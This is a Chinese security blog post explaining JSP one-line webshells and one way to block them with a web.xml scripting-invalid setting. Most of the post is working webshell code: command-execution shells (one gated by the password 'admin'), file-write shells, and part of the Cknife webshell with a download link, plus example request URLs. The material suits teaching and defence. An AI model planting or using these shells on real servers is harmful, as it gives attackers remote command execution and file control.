美文网首页网络安全
JSP 一句话木马与防范

JSP 一句话木马与防范

作者: 菩提树下成魔 | 来源:发表于2018-01-09 10:40 被阅读2876次

0x01 前言

  一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。

0x02 一句话木马样本举例

一、样本一

  • 命令執行
<%Runtime.getRuntime().exec(request.getParameter("cmd"));%>

  Runtime 类封装了运行时的环境。每个 Java 应用程序都有一个 Runtime 类实例,使应用程序能够与其运行的环境相连接。使用 getRuntime() 构建 Runtime 类实例。 getRuntime() 返回与当前 Java 应用程序相关的运行时对象。获取实例后调用 exec() 方法执行系统命令。

  request 为 JSP 内置对象,getParameter() 方法获取请求参数 cmd的值构建命令 。

请求URL:http://127.0.0.1/shell.jsp?cmd=calc

二、样本二

  • 命令執行
<%@ page language="java" contentType="text/html; charset=GBK"
    pageEncoding="UTF-8"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

    <head>
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
        <title>一句话木马</title>
    </head>

    <body>
        <%
        if ("admin".equals(request.getParameter("pwd"))) {
            java.io.InputStream input = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
            int len = -1;
            byte[] bytes = new byte[4092];
            out.print("<pre>");
            while ((len = input.read(bytes)) != -1) {
                out.println(new String(bytes, "GBK"));
            }
            out.print("</pre>");
        }
    %>
    </body>

</html>

  原理与样本一相同, inputStream() 方法获取命令回显输出到前端页面中。

请求URL:http://127.0.0.1/shell.jsp?pwd=admin&cmd=calc

三、样本三

  • 文件写入
<%
    // ISO-8859-1 输入
    new java.io.FileOutputStream(request.getParameter("file")).write(request.getParameter("content").getBytes());
    // UTF-8 输入
    new java.io.FileOutputStream(request.getParameter("file")).write(new String(request.getParameter("content").getBytes("ISO-8859-1"), "UTF-8").getBytes());
    // Web 目录写入
    new java.io.FileOutputStream(application.getRealPath("/") + "/" + request.getParameter("filename")).write(request.getParameter("content").getBytes());
    // 功能更加丰富的写入
    new java.io.RandomAccessFile(request.getParameter("file"),"rw").write(request.getParameter("content").getBytes());
%>

  new FileOutputStream(name, append) 调用 FileOutputStream 类构造函数创建文件,并写入内容。file 参数为文件全限定名,filename 为文件名,content 为文本内容。

// ISO-8859-1 输入
请求URL:http://127.0.0.1/input.jsp?file=D:/test.txt&content=test
// UTF-8 输入
请求URL:http://127.0.0.1/input.jsp?file=D:/test.txt&content=测试内容
// Web 目录写入
请求URL:http://127.0.0.1/input.jsp?filename=test.txt&content=test
// 功能更加丰富的写入
请求URL:http://127.0.0.1/input.jsp?file=D:/test.txt&content=test

四、反射调用外部 Jar 包

  • 菜刀木马
<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%>
<%!
    String Pwd = "Cknife";
    String cs = "UTF-8";

    String EC(String s) throws Exception {
        return new String(s.getBytes("ISO-8859-1"),cs);
    }

    Connection GC(String s) throws Exception {
        String[] x = s.trim().split("choraheiheihei");
        Class.forName(x[0].trim());
        if(x[1].indexOf("jdbc:oracle")!=-1){
            return DriverManager.getConnection(x[1].trim()+":"+x[4],x[2].equalsIgnoreCase("[/null]")?"":x[2],x[3].equalsIgnoreCase("[/null]")?"":x[3]);
        }else{
            Connection c = DriverManager.getConnection(x[1].trim(),x[2].equalsIgnoreCase("[/null]")?"":x[2],x[3].equalsIgnoreCase("[/null]")?"":x[3]);
            if (x.length > 4) {
                c.setCatalog(x[4]);
            }
            return c;
        }
    }

    void AA(StringBuffer sb) throws Exception {
        File k = new File("");
        File r[] = k.listRoots();
        for (int i = 0; i < r.length; i++) {
            sb.append(r[i].toString().substring(0, 2));
        }
    }

    // 省略部分代码,详情访问:
    // 源码:https://github.com/Chora10/Cknife
    // 下载地址:http://pan.baidu.com/s/1nul1mpr  密码:f65g

        } catch (Exception e) {
            sb.append("ERROR" + ":// " + e.toString());
        }
        sb.append("|" + "<-");
        out.print(sb.toString());
    }
%>

0x03 防范方法

  前提条件:Java Web 应用没有在 JSP 中直接使用任何 Java 代码,否则会对应用本身造成影响。

<jsp-config>
    <jsp-property-group>
        <url-pattern>*.jspx</url-pattern>
        <url-pattern>*.jsp</url-pattern>
        <scripting-invalid>true</scripting-invalid>
    </jsp-property-group>
</jsp-config>

  配置生效后,将不允许 Jsp / Jspx 文件中包含任何 scripting ,包括:

<%%> 与 <jsp:scriptlet></jsp:scriptlet>

<%!%> 与 <jsp:declaration></jsp:declaration>

<%=%> 与 <jsp:expression></jsp:expression>

  包括这些的 Jsp / Jspx 文件在编译的时候将产生编译错误。目前能看见的 Java 的 webshell 全都离不开这几种语法,所以应该可以说是能够禁止所有目前已知的 Java WebShell。

参考资料:http://mp.weixin.qq.com/s/-YSSINSZfthYVL1HKUovSg

相关文章

  • JSP 一句话木马与防范

    0x01 前言   一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。 0x02 一句...

  • 一句话木马

    一句话木马 asp php aspx 一句话木马变形 jsp脚本后门 先把下面的代码保存为 one.jsp (该代...

  • 黑客攻防入门 (第三章:木马植入与清除)

    要点导航:1)木马的概念2)制作与伪装木马3)木马启动技术4)黑客常用的木马工具5)防范木马入侵电脑 什么是木马?...

  • jsp木马

    参考地址:https://www.cnblogs.com/firstdream/p/9102026.html js...

  • JSP一句话木马

    <% if(request.getParameter(“f”)!=null)(new java.io.FileOu...

  • War木马制作并tomcat成功getshell

    WAR木马文件制作 (1)安装jdk (2)在网上找一个jsp马 (3)将ma.jsp小马放在JDK_HOME/b...

  • 一句话木马

    asp一句话木马是<%execute(request("value"))%> aspx的一句话木马是<%@ Pag...

  • 特洛伊木马的基本概述与防范

    A 概述 木马(trojan)具有破坏性,同时具有很强的隐蔽性。经过精心设计,欺骗性很强,但和病毒不同,不具备自我...

  • 安全检测关键技术之Web木马检测和绕过

    Web木马一般是为了获得对网站的持久控制而留下的脚本。分为一句话木马和大马。一句话木马指的是并没有完整的网站控制功...

  • PHP一句话木马之小马

    什么是一句话木马 一句话木马就是只需要一行代码的木马,短短一行代码,就能做到和大马相当的功能。为了绕过waf的检测...

网友评论

    本文标题:JSP 一句话木马与防范

    本文链接:https://www.haomeiwen.com/subject/pxcnpxtx.html